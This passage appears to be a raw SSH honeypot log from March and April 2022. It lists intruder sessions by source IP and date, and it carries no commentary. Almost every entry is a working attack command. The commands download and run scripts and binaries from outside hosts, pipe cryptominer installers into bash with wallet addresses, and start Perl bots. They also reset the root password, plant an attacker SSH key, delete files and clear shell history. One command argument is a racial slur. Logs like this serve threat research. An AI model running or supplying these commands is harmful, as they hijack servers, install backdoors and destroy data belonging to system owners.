onions1337 sh onions1337 tftp 45.90.161.105 -c get bins.sh chmod 777 onions1337 sh onions1337 tftp -r .sh -g 45.90.161.105 chmod 777 .sh sh .sh ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh sh .sh rm -rf sh onions1337 .sh .sh rm -rf * From 179.43.175.108 22-Mar-2022 02:55:30 ssh2 root Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; cd /tmp; wget http://179.43.175.108/putkite/quickr1n.sh; sh quickr1n.sh curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA cd /tmp wget http://179.43.175.108/putkite/quickr1n.sh sh quickr1n.sh From 179.43.175.108 22-Mar-2022 06:11:12 ssh2 root Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; cd /tmp; wget http://179.43.175.108/putkite/quickr1n.sh; sh quickr1n.sh curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA cd /tmp wget http://179.43.175.108/putkite/quickr1n.sh sh quickr1n.sh From 136.144.41.22 22-Mar-2022 22:57:52 ssh2 root Exec wget 23.94.22.13/x86; chmod 777 x86; ./x86 nigga wget 23.94.22.13/x86 chmod 777 x86 ./x86 nigga From 58.216.207.82 23-Mar-2022 13:28:48 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';export HOME=/dev/shm ;curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2 ; export HOME=/root uname -a lspci | grep -i --color 'vga\|3d\|2d' export HOME=/dev/shm curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2 export HOME=/root From 179.43.168.126 23-Mar-2022 21:01:47 ssh2 root Exec cd /tmp; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://179.43.175.170/putkite/quickr1n.sh; chmod 777 *; sh quickr1n.sh; echo storytime cd /tmp curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA wget http://179.43.175.170/putkite/quickr1n.sh chmod 777 * sh quickr1n.sh echo storytime From 179.43.168.126 25-Mar-2022 02:59:25 ssh2 root Exec cd /tmp; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; echo root:r143gsa1n431g241hs3h12344|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; ls /proc/driver/nvidia/gpus cd /tmp curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:r143gsa1n431g241hs3h12344|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' ls /proc/driver/nvidia/gpus From 179.43.154.137 25-Mar-2022 13:08:39 ssh2 root Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; lspci | grep -i --color 'vga\|3d\|2d'; echo root:ds234e3123g4tij24jtiu3ji23rg|chpasswd|bash curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA lspci | grep -i --color 'vga\|3d\|2d' echo root:ds234e3123g4tij24jtiu3ji23rg|chpasswd|bash From 43.132.157.120 26-Mar-2022 12:54:17 ssh2 root Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l From 194.31.98.246 27-Mar-2022 07:07:19 ssh2 root Exec wget 23.94.22.13/x86; chmod 777 x86; ./x86 nigga wget 23.94.22.13/x86 chmod 777 x86 ./x86 nigga From 134.209.199.124 27-Mar-2022 07:53:55 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/onions1337; curl -O http://45.90.161.105/onions1337; chmod 777 onions1337; sh onions1337; tftp 45.90.161.105 -c get bins.sh; chmod 777 onions1337; sh onions1337; tftp -r .sh -g 45.90.161.105; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh onions1337 .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.90.161.105/onions1337 curl -O http://45.90.161.105/onions1337 chmod 777 onions1337 sh onions1337 tftp 45.90.161.105 -c get bins.sh chmod 777 onions1337 sh onions1337 tftp -r .sh -g 45.90.161.105 chmod 777 .sh sh .sh ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh sh .sh rm -rf sh onions1337 .sh .sh rm -rf * From 120.196.217.7 27-Mar-2022 15:15:41 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr From 179.43.154.137 27-Mar-2022 22:54:19 ssh2 root Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; lspci | grep -i --color 'vga\|3d\|2d'; echo root:ds234e3123g4tij24jtiu3ji23rg|chpasswd|bash curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA lspci | grep -i --color 'vga\|3d\|2d' echo root:ds234e3123g4tij24jtiu3ji23rg|chpasswd|bash From 134.209.199.124 29-Mar-2022 00:21:54 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/onions1337; curl -O http://45.90.161.105/onions1337; chmod 777 onions1337; sh onions1337; tftp 45.90.161.105 -c get bins.sh; chmod 777 onions1337; sh onions1337; tftp -r .sh -g 45.90.161.105; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh onions1337 .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.90.161.105/onions1337 curl -O http://45.90.161.105/onions1337 chmod 777 onions1337 sh onions1337 tftp 45.90.161.105 -c get bins.sh chmod 777 onions1337 sh onions1337 tftp -r .sh -g 45.90.161.105 chmod 777 .sh sh .sh ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh sh .sh rm -rf sh onions1337 .sh .sh rm -rf * From 34.122.84.129 29-Mar-2022 07:49:05 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/ssh.sh; curl -O http://31.210.20.190/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp 31.210.20.190 -c get ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp -r ssh2.sh -g 31.210.20.190; chmod 777 ssh2.sh; sh ssh2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.210.20.190 ssh1.sh ssh1.sh; sh ssh1.sh; rm -rf ssh.sh ssh.sh ssh2.sh ssh1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://31.210.20.190/ssh.sh curl -O http://31.210.20.190/ssh.sh chmod 777 ssh.sh sh ssh.sh tftp 31.210.20.190 -c get ssh.sh chmod 777 ssh.sh sh ssh.sh tftp -r ssh2.sh -g 31.210.20.190 chmod 777 ssh2.sh sh ssh2.sh ftpget -v -u anonymous -p anonymous -P 21 31.210.20.190 ssh1.sh ssh1.sh sh ssh1.sh rm -rf ssh.sh ssh.sh ssh2.sh ssh1.sh rm -rf * From 64.31.8.14 29-Mar-2022 14:19:35 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.190/ssh.sh; curl -O http://31.210.20.190/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp 31.210.20.190 -c get ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp -r ssh2.sh -g 31.210.20.190; chmod 777 ssh2.sh; sh ssh2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.210.20.190 ssh1.sh ssh1.sh; sh ssh1.sh; rm -rf ssh.sh ssh.sh ssh2.sh ssh1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://31.210.20.190/ssh.sh curl -O http://31.210.20.190/ssh.sh chmod 777 ssh.sh sh ssh.sh tftp 31.210.20.190 -c get ssh.sh chmod 777 ssh.sh sh ssh.sh tftp -r ssh2.sh -g 31.210.20.190 chmod 777 ssh2.sh sh ssh2.sh ftpget -v -u anonymous -p anonymous -P 21 31.210.20.190 ssh1.sh ssh1.sh sh ssh1.sh rm -rf ssh.sh ssh.sh ssh2.sh ssh1.sh rm -rf * From 177.73.2.57 29-Mar-2022 19:02:26 ssh2 root Exec cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ cd ~ rm -rf .ssh mkdir .ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys chmod -R go= ~/.ssh cd ~ From 118.69.226.254 30-Mar-2022 00:27:19 ssh2 root Exec nproc;curl -O 5.161.51.216/bot;perl bot nproc curl -O 5.161.51.216/bot perl bot From 59.12.160.91 31-Mar-2022 03:30:57 ssh2 root Exec uname -a; cd /tmp ;curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2 uname -a cd /tmp curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2 From 85.202.169.132 1-Apr-2022 04:26:38 ssh2 root Exec wget 23.95.0.211/x86_64; chmod 777 x86_64; ./x86_64 wns.x86 wget 23.95.0.211/x86_64 chmod 777 x86_64 ./x86_64 wns.x86 From 35.227.153.91 1-Apr-2022 09:39:34 ssh2 root Exec echo pizDone echo pizDone From 143.198.231.66 1-Apr-2022 14:12:44 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.210.20.60/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 31.210.20.60 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://31.210.20.60/SnOoPy.sh chmod 777 * sh SnOoPy.sh tftp -g 31.210.20.60 -r tftp1.sh chmod 777 * sh tftp1.sh rm -rf *.sh history -c From 144.22.251.63 1-Apr-2022 14:50:50 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN From 72.167.41.0 1-Apr-2022 17:43:45 ssh2 root ls w free -g cd .ss cd .ssh ls exit From 167.99.211.153 2-Apr-2022 02:13:53 ssh2 root Exec curl -O http://45.90.161.105/systemd ; wget http://45.90.161.105/systemd ; chmod +777 * ; ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 curl -O http://45.90.161.105/systemd wget http://45.90.161.105/systemd chmod +777 * ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 From 159.223.219.111 2-Apr-2022 13:13:21 ssh2 root Exec curl -O http://45.90.161.105/systemd ; wget http://45.90.161.105/systemd ; chmod +777 * ; ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 curl -O http://45.90.161.105/systemd wget http://45.90.161.105/systemd chmod +777 * ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 From 20.86.187.120 2-Apr-2022 16:26:20 ssh2 root Exec curl -O http://45.90.160.54/systemd ; wget http://45.90.160.54/systemd ; chmod +777 * ; ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 curl -O http://45.90.160.54/systemd wget http://45.90.160.54/systemd chmod +777 * ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 From 20.219.147.175 2-Apr-2022 17:51:38 ssh2 root Exec curl -O orginal.win/start.sh ; wget orginal.win/start.sh ; chmod +777 * ; ./start.sh curl -O orginal.win/start.sh wget orginal.win/start.sh chmod +777 * ./start.sh From 206.81.22.139 3-Apr-2022 09:28:25 ssh2 root Exec cat /etc/issue ; wget 104.248.171.242/bot.pl ; curl -O 104.248.171.242/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; rm -rf bot* ; history -c cat /etc/issue wget 104.248.171.242/bot.pl curl -O 104.248.171.242/bot.pl perl bot.pl rm -rf bot.pl history -c rm -rf bot* history -c From 206.81.22.139 3-Apr-2022 16:01:12 ssh2 root Exec cat /etc/issue ; wget 104.248.171.242/bot.pl ; curl -O 104.248.171.242/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; rm -rf bot* ; history -c cat /etc/issue wget 104.248.171.242/bot.pl curl -O 104.248.171.242/bot.pl perl bot.pl rm -rf bot.pl history -c rm -rf bot* history -c From 161.35.84.195 3-Apr-2022 19:53:48 ssh2 root Exec curl -O http://45.90.161.105/systemd ; wget http://45.90.161.105/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 curl -O http://45.90.161.105/systemd wget http://45.90.161.105/systemd chmod +x * ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 From 188.166.36.182 3-Apr-2022 20:44:32 ssh2 root Exec curl -O http://45.90.161.105/systemd ; wget http://45.90.161.105/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 curl -O http://45.90.161.105/systemd wget http://45.90.161.105/systemd chmod +x * ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 From 185.176.221.91 3-Apr-2022 20:52:27 ssh2 root Exec cd /tmp; wget http://weedbox.net/wget.sh; chmod +x wget.sh; sh wget.sh || curl http://46.246.38.61/curl.sh -o curl.sh; chmod +x curl.sh; sh curl.sh cd /tmp wget http://weedbox.net/wget.sh chmod +x wget.sh sh wget.sh || curl http://46.246.38.61/curl.sh -o curl.sh chmod +x curl.sh sh curl.sh From 185.176.221.91 3-Apr-2022 21:03:56 ssh2 root Exec cd /tmp; wget http://weedbox.net:9090/wget.sh; chmod +x wget.sh; sh wget.sh || curl http://weedbox.net:9090/curl.sh -o curl.sh; chmod +x curl.sh; sh curl.sh cd /tmp wget http://weedbox.net:9090/wget.sh chmod +x wget.sh sh wget.sh || curl http://weedbox.net:9090/curl.sh -o curl.sh chmod +x curl.sh sh curl.sh From 116.252.28.121 3-Apr-2022 22:42:38 ssh2 root Exec uname -a uname -a Exec uname -a uname -a Exec uname -a uname -a From 171.107.11.147 3-Apr-2022 22:42:44 ssh2 root Exec uname -a uname -a Exec uname -a uname -a From 46.97.169.198 4-Apr-2022 00:37:11 ssh2 root w ls -a php -v yum install php -y scp install php cat /etc/issue ls -as cd /etc ls -a apt-get install php php -v apt-get install php -y apt-getupdate apt-getinstall apache2 apt-getinstall php apt-getinstall php7.0-xml apt-getinstall php7.0-sqlite3 apt-getinstall libapache2-mod-php sudo systemctl reload apache2 sudo systemctl restart apache2 sudo apt install python-certbot-apache -y apt-getinstall php-curl history -c -y apt-getupdate apt-getinstall apache2 apt-getinstall php apt-getinstall php7.0-xml apt-getinstall php7.0-sqlite3 apt-getinstall libapache2-mod-php sudo systemctl reload apache2 sudo systemctl restart apache2 sudo apt install python-certbot-apache -y apt-getinstall php-curl history -c -y apt-get update apt-get install apache2 apt-get install php apt-get install php7.0-xml apt-get install php7.0-sqlite3 apt-get install libapache2-mod-php sudo systemctl reload apache2 sudo systemctl restart apache2 sudo apt install python-certbot-apache -y apt-get install php-curl history -c -y php -v ll ls -as ls nano mbox cat mbox cd mbox ls -as ls ps x cat /proc/cpuinfo From 130.162.183.218 4-Apr-2022 00:39:57 ssh2 root Exec curl -O http://45.90.161.105/systemd ; wget http://45.90.161.105/systemd ; chmod +x * ; ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 curl -O http://45.90.161.105/systemd wget http://45.90.161.105/systemd chmod +x * ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 ifconfig cd /dev/shm wget http://soho.altervista.org/asssja/goshs1.zip From 162.247.74.202 4-Apr-2022 00:44:19 ssh2 root apt-get install wget -y wget http://soho.altervista.org/asssja/goshs1.zip cd /tmp ls -a wget http://soho.altervista.org/asssja/goshs1.zip cd /root wget http://soho.altervista.org/asssja/goshs1.zip cd /var/tmp ls wget http://soho.altervista.org/asssja/goshs1.zip From 161.35.82.143 4-Apr-2022 05:05:04 ssh2 root Exec curl -O http://45.90.160.54/systemd ; wget http://45.90.160.54/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 curl -O http://45.90.160.54/systemd wget http://45.90.160.54/systemd chmod +x * ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 From 159.223.223.252 4-Apr-2022 08:01:47 ssh2 root Exec curl -O http://45.90.160.54/systemd ; wget http://45.90.160.54/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 curl -O http://45.90.160.54/systemd wget http://45.90.160.54/systemd chmod +x * ./systemd -o de.minexmr.com:443 -B -u 47Yz2np6PGzMw1u2WYpgW2Qv8WMfsy1dKLYsH9GMP9d5ZKZ6GqcGJ86YbKQ8t5MUFGHrA2j61QwNx9yD1oe2ek6DVptxdE7 -k --tls --rig-id ZTX1 From 144.22.226.64 4-Apr-2022 11:45:58 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN From 179.43.154.137 5-Apr-2022 08:03:04 ssh2 root Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; lspci | grep -i --color 'vga\|3d\|2d'; echo root:ggds234e3123g4tij24jti1u3ji23rg|chpasswd|bash curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA lspci | grep -i --color 'vga\|3d\|2d' echo root:ggds234e3123g4tij24jti1u3ji23rg|chpasswd|bash From 68.183.1.92 5-Apr-2022 18:26:48 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/ztx; curl -O http://45.90.161.105/ztx; chmod 777 ztx; sh ztx; tftp 45.90.161.105 -c get ztx.sh; chmod 777 ztx.sh; sh ztx.sh; tftp -r .sh -g 45.90.161.105; chmod 777 ztx; sh ztx; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.90.161.105/ztx curl -O http://45.90.161.105/ztx chmod 777 ztx sh ztx tftp 45.90.161.105 -c get ztx.sh chmod 777 ztx.sh sh ztx.sh tftp -r .sh -g 45.90.161.105 chmod 777 ztx sh ztx ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh sh .sh rm -rf sh bins.sh .sh .sh rm -rf * From 103.9.36.251 6-Apr-2022 07:07:18 ssh2 root Exec uname -a ; lscpu uname -a lscpu From 64.227.72.90 6-Apr-2022 15:14:23 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.161.105/ztx; curl -O http://45.90.161.105/ztx; chmod 777 ztx; sh ztx; tftp 45.90.161.105 -c get ztx.sh; chmod 777 ztx.sh; sh ztx.sh; tftp -r .sh -g 45.90.161.105; chmod 777 ztx; sh ztx; ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.90.161.105/ztx curl -O http://45.90.161.105/ztx chmod 777 ztx sh ztx tftp 45.90.161.105 -c get ztx.sh chmod 777 ztx.sh sh ztx.sh tftp -r .sh -g 45.90.161.105 chmod 777 ztx sh ztx ftpget -v -u anonymous -p anonymous -P 21 45.90.161.105 .sh .sh sh .sh rm -rf sh bins.sh .sh .sh rm -rf * From 85.202.169.124 6-Apr-2022 17:45:38 ssh2 root Exec wget 194.31.98.248/x86_64; chmod 777 x86_64; ./x86_64 wns.x86 wget 194.31.98.248/x86_64 chmod 777 x86_64 ./x86_64 wns.x86 From 34.133.127.223 8-Apr-2022 03:58:03 